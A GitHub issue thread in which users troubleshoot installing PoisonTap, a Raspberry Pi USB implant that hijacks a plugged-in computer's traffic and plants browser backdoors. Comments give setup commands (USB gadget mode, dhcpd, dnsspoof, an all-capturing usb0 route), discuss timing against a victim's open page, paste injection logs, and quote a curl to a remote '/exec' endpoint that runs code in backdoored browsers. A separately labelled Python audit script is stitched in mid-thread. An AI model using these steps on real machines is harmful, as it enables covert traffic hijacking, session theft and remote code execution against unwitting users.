Comments (28)
Hmm, there may be some initial setup that I forgot to cover -- check the modular section here:
https://gist.github.com/gbaman/50b6cca61dd1c3f88f41
from poisontap.
@samyk And what is the dhcpd.conf configuration ? I tried but the adapter gives to the user a 169.254.X.X address automatically...
from poisontap.
I recommend splitting pi_startup.sh into a pi_config.sh and a bash script which is run on startup.
Also, you can add these lines to a config script to set up the pi as a usb gadget and install dependencies:
echo "dwc_otg.lpm_enable=0 console=serial0,115200 console=tty1 root=/dev/mmcblk0p2 rootfstype=ext4 elevator=deadline fsck.repair=yes rootwait modules-load=dwc2,g_ether" > /boot/cmdline.txt
echo "" >> /boot/config.txt
echo "dtoverlay=dwc2" >> /boot/config.txt
apt-get update && apt-get upgrade
apt-get install dsniff isc-dhcp-server nodejs screen
I'm unsure exactly which package you use for the dhcp server- apt-get installs udhcpd when trying to install dhcpd. Also, there is a package node as well as a package nodejs.
The main issue I'm facing is the dhcp server daemon fails to start-- obviously we listen for dhcp requests on usb0, but I haven't deduced the scope yet.
from poisontap.
@tomnick backend_server.js is a pretty simple script, if you read it you should be able to see how it works. I've not got anything open right now but I'm pretty sure you can just do a http request to:
yourserver.com:port/exec?your_code_here
See Samy's examples in the readme:
curl 'http://samy.pl:1337/exec?alert("muahahahaha")'
from poisontap.
Try: sudo npm -g install websocket
Also, make sure you're on Node v6.
from poisontap.
This is it...working...thanks a lot...
from poisontap.
Also, dsniff (which contains dnsspoof), screen, node.js, and dhcpd need to be installed (via apt-get should be fine)
from poisontap.
@jreziga Added dhcpd.conf in 838a035
from poisontap.
@tomnick With @ForeverRising's instructions and 838a035 do things work properly for you?
from poisontap.
I've also added some additional installation instructions in 26dd781
from poisontap.
There are still issues on my side.
DHCP server can't start well
not much information in the log...
dhcpd.conf is the same you just provided
Still troubleshooting, I'll post here if I find something
from poisontap.
Ah, also need to set the IP up:
echo -e "\nauto usb0\nallow-hotplug usb0\niface usb0 inet static\n\taddress 1.0.0.1\n\tnetmask 0.0.0.0" >> /etc/network/interfaces
Then reboot and test
from poisontap.
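An added example, not part of the original thread or the PoisonTap project: a small audit that parses ifupdown `interfaces` text and flags static stanzas whose netmask puts nearly all of IPv4 on-link, as the `netmask 0.0.0.0` in the comment above does. The sample file contents, the function names and the /8 threshold are assumptions made for illustration.

```python
import ipaddress

# Constructed sample: an ordinary static stanza plus the usb0 stanza from the comment.
SAMPLE = """\
auto eth0
iface eth0 inet static
    address 192.168.1.10
    netmask 255.255.255.0

auto usb0
allow-hotplug usb0
iface usb0 inet static
    address 1.0.0.1
    netmask 0.0.0.0
"""

def parse_static_stanzas(text):
    """Return {iface: {option: value}} for every 'iface <name> inet static' stanza."""
    stanzas, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        words = line.split()
        if words[0] == "iface":
            current = None
            if words[2:4] == ["inet", "static"]:
                current = stanzas.setdefault(words[1], {})
        elif words[0] in ("auto", "source", "mapping") or words[0].startswith("allow-"):
            current = None  # these keywords end the previous stanza
        elif current is not None and len(words) >= 2:
            current[words[0]] = " ".join(words[1:])
    return stanzas

def broad_on_link(text, min_prefix=8):
    """List (iface, network, prefixlen) for stanzas with a prefix shorter than min_prefix."""
    findings = []
    for name, opts in parse_static_stanzas(text).items():
        addr, mask = opts.get("address"), opts.get("netmask")
        if addr is None:
            continue
        if "/" not in addr and mask:
            addr = f"{addr}/{mask}"  # ipaddress accepts dotted netmasks
        net = ipaddress.ip_interface(addr).network
        if net.prefixlen < min_prefix:
            findings.append((name, str(net), net.prefixlen))
    return findings
```

On the constructed sample only `usb0` is reported, with network `0.0.0.0/0`: a netmask of 0.0.0.0 is a prefix length of 0, so every IPv4 address is treated as directly reachable on that interface.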
@samyk I was writing a post to ask for your /etc/network/interfaces file, nice move ;)
Edit: Alright it worked !
from poisontap.
I used /etc/dhcpd.conf for the static IP. Does editing the interfaces file work for you?
from poisontap.
@ForeverRising dhcpd.conf goes inside /etc/dhcp/dhcpd.conf and not in /etc/dhcpd.conf
Plus you need to run:
echo -e "\nauto usb0\nallow-hotplug usb0\niface usb0 inet static\n\taddress 1.0.0.1\n\tnetmask 0.0.0.0" >> /etc/network/interfaces
(try logged in as root; I was unable to do this with that one-line command using sudo)
And yes it worked.
@samyk I'm playing with it now. I still have some questions, like:
- If the victim has "nfl.com" open in his browser, does it work directly when you plug in the Rpi? Or does the user need to refresh the page in his browser? (It seems like the 1st scenario isn't working, or am I doing something wrong?)
Edit: Solved. No refresh needed, just patience for this one :D (but still the reverse websocket issue :c )
Also I've set up my server with port 1337 wide open but I can't get any reverse websocket connection.
In the Rpi logs I see that backdoor.html is injected
>>> Inject Backdoor HTML reverse ws 1337
Request: 1.0.0.1.pin.ip.samy.pl/PoisonTap
{ host: '1.0.0.1.pin.ip.samy.pl',
connection: 'keep-alive',
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',
accept: 'image/webp,image/*,*/*;q=0.8',
'accept-encoding': 'gzip, deflate, sdch',
'accept-language': 'fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4' }
But nothing on the node server console output
Edit: Solved. My bad "Remotely Accessible Web-Based Backdoors" is available only for CDN js files included in webpages
from poisontap.
I'll try again with a sudo su -. What does ip a show with the static (set with the interfaces file)?
NFL.com seemed to reload every minute or so, I think it was chosen for the example for this reason. I haven't looked at the source and meta tags for the site though.
Also, I don't use newline characters in an echo command. Just habit for me.
from poisontap.
@ForeverRising I've made a small installation guide. Check at the bottom of this page: https://github.com/jreziga/poisontap/blob/068c2836deb61b150946acf3395ccf11eb3b3ad1/README.md
from poisontap.
Alright, mine is running now like a charm... is there any instruction on how to use the tools like backend_server.js or how to access remotely etc?
from poisontap.
Also note the backdoor has jQuery built in so you have full access to jQuery functionality
from poisontap.
Which websocket library is the project based on?
from poisontap.
https://www.npmjs.com/package/websocket
from poisontap.
Getting this error on my server trying to install in the directory "poisontap" with the "backend_server.js" file included only:
npm install websocket
[email protected] install /root/node_modules/websocket
(node-gyp rebuild 2> builderror.log) || (exit 0)
/root
├── [email protected]
└── [email protected]
npm WARN enoent ENOENT: no such file or directory, open '/root/package.json'
npm WARN root No description
npm WARN root No repository field.
npm WARN root No README data
npm WARN root No license field.
from poisontap.
Should add package npm to the apt-get line of the script and a npm -g websocket line as well.
from poisontap.
Worth noting that the ReadMe says that NodeJS may already be installed. Yes, it is, but a very old version (0.10.29??) so you need to install this v6.
First you need to remove all references to the current version 👍
sudo apt-get remove nodered -y
sudo apt-get remove nodejs nodejs-legacy -y
sudo apt-get remove npm -y
then:
wget https://nodejs.org/dist/latest-v6.x/node-v6.9.1-linux-armv6l.tar.gz
tar -xvf node-v6.9.1-linux-armv6l.tar.gz
cd node-v6.9.1-linux-armv6l
sudo cp -R * /usr/local/
sudo reboot
Now you have an updated version of Node that will run just fine.
from poisontap.
Did exactly what you wrote and the results after reboot are:
node -v
The program 'node' is currently not installed. You can install it by typing:
apt install nodejs-legacy
So after I did install nodejs-legacy:
node -v
v4.2.6
No v6!
from poisontap.
I've just reformatted so that it's obvious that each is a separate command, can't just copy and paste the whole line...
Pretty sure you need v6 and up.
from poisontap.
Which directory to unpack the top Alexa?
from poisontap.
ln: failed to create symbolic link ‘configs/c.1/acm.usb0’: File exists
sh: echo: I/O error
sh: echo: I/O error
ln: failed to create symbolic link ‘configs/c.1/ecm.usb0’: File exists
ls: write error: Device or resource busy
ifup: interface usb0 already configured
SIOCADDRT: File exists
[ ok ] Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service.
net.ipv4.ip_forward = 1
How do you solve this problem? Ask the great god for help
from poisontap.